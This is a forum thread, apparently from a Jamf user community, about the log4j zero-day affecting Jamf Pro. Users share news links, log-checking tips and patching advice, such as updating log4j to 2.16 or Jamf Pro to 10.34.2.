RCE 0-day exploit found in log4j

Elies
New Contributor II

hello together!
A zero day exploit has been found which affects the latest version of jamf.
https://www.lunasec.io/docs/blog/log4j-zero-day/

This exploit affects the java logger log4j, which is used by Jamf. If you are hosting an onpremise version, take a look at the JSSAccess.log to check for anomalies.

42 REPLIES 42

adrw
New Contributor II

A new, simpler to exploit, log4j vector using websockets and not much more than a normal page load.

https://www.zdnet.com/article/security-firm-blumira-discovers-major-new-log4j-attack-vector/ 

 

remediation advise is the same as before, patch log4j to 2.16 and monitor in/out requests

donmontalvo
Esteemed Contributor III

Ok, ok, I didn't really want to go to the movies tonight.

Jamf Pro 10.34.2, here I come.

--
https://donmontalvo.com

adrw
New Contributor II

You bet, we're all eagerly waiting.

I'd rather patch Jamf to 10.34.2 with log4j patch included, then patch log4j in isolation.